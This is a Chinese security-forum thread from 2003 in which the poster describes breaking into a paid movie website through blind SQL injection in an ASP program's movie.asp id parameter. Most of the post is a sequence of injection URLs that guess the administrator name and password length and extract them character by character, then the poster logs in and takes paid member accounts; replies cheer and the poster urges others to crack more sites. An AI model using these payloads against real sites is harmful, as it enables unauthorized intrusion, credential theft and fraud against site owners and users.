黑色海岸线论坛 » 网络安全 » 简单入侵收费电影网站!

返回列表发帖

黑暗之眼 该用户已被删除

楼主 跳转到 » 正序看帖

字体大小: tT

黑暗之眼发表于 2003-8-22 09:51 | 只看该作者

简单入侵收费电影网站!

LBHIDDEN[0]LBHIDDEN[这个贴子最后由黑暗之眼在 2003/08/22 10:06am 第 1 次编辑]

近日学习sql injection,下载金梅收费电影程序2003会员版看了一通,
现movie.asp这个文件有问题,
dim sql
dim rs
articleid=request("id")
set rs=server.createobject("adodb.recordset")
sql="update learning set hits=hits+1 where articleID="&articleid
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1
title=rs("title")
ittype=rs("typeid")
没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,
我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>8)
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)
正常返回页面,好极了,由此得出
name为8位
同样
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!
不管了,我们接下来开始测试管理员的用户名
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出，使用方法 mid(字符串，起始位，取出的字符串的长度)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)
"无法显示页面",看来比100还小.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为:d
接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!:)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)
正常显示页面,再来
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)
"无法显示页面",比110小哦,呵呵
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f
最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵
注:文章拿去投稿了,到现在还没结果,如果你看了觉得好,也最好不要拿去转载,谢谢!

黑海舰队列兵

主题: 0
积分: 0
贝壳: 0 个
注册时间: 2007-2-1
最后登录: 2007-2-1

14楼

li899发表于 2003-9-1 09:54 | 只看该作者

简单入侵收费电影网站!

呵呵~~~还有没有简单点的~~~~

蓝点 该用户已被删除

13楼

蓝点发表于 2003-8-25 16:45 | 只看该作者

简单入侵收费电影网站!

有个性，这样也行，我也得去试试

hongsushou 该用户已被删除

12楼

hongsushou发表于 2003-8-24 23:41 | 只看该作者

简单入侵收费电影网站!

为什么我试了一个网站用每条命令页面都能正常反回，我是昭上面的做的，是不什么地方不对呀，请教，谢谢

风云smsms 该用户已被删除

11楼

风云smsms发表于 2003-8-23 18:22 | 只看该作者

简单入侵收费电影网站!

嘿嘿，这可是个好东东哈

黑暗之眼 该用户已被删除

10楼

黑暗之眼发表于 2003-8-22 21:43 | 只看该作者

简单入侵收费电影网站!

各个程序都不一样,自己下载下来看看吧

hongsushou 该用户已被删除

9楼

hongsushou发表于 2003-8-22 21:06 | 只看该作者

简单入侵收费电影网站!

管理员的默认登陆界面在什么地方？

黑暗之眼 该用户已被删除

8楼

黑暗之眼发表于 2003-8-22 20:56 | 只看该作者

简单入侵收费电影网站!

是的,大部分电影管理系统都存在这个毛病,而且密码都是明文的,这个也是关键,再关键是你得到管理员帐号和密码之后,要知道管理员的登录界面,要是默认的还好,管理员要是改过的话,那就要慢慢猜了,呵呵

剑在弦 该用户已被删除

7楼

剑在弦发表于 2003-8-22 20:39 | 只看该作者

简单入侵收费电影网站!

哈哈，写得蛮好的啊
娱乐的时候不忘工作，哈哈

hongsushou 该用户已被删除

6楼

hongsushou发表于 2003-8-22 20:25 | 只看该作者

简单入侵收费电影网站!

是不是大部份电影网站都可以呀

黑暗之眼 该用户已被删除

5楼

黑暗之眼发表于 2003-8-22 19:28 | 只看该作者

简单入侵收费电影网站!

给自己加个精,呵呵!
这里只是列出了个思路,还不太详细,我拿去投稿的文章比较详细,就是费话多了点,:)

黑海舰队列兵

主题: 0
积分: 0
贝壳: 0 个
注册时间: 2007-1-18
最后登录: 2007-1-18

地板

damnyou发表于 2003-8-22 18:58 | 只看该作者

简单入侵收费电影网站!

  好。

  术业有专攻

Yuki 该用户已被删除

板凳

Yuki发表于 2003-8-22 10:09 | 只看该作者

简单入侵收费电影网站!

有意思

工作娱乐两不误呀！！

黑暗之眼 该用户已被删除

沙发

黑暗之眼发表于 2003-8-22 09:56 | 只看该作者

简单入侵收费电影网站!

自己一个人破帐号蛮累的,大家有兴趣多破几个电影网站,呵呵

返回列表回复发帖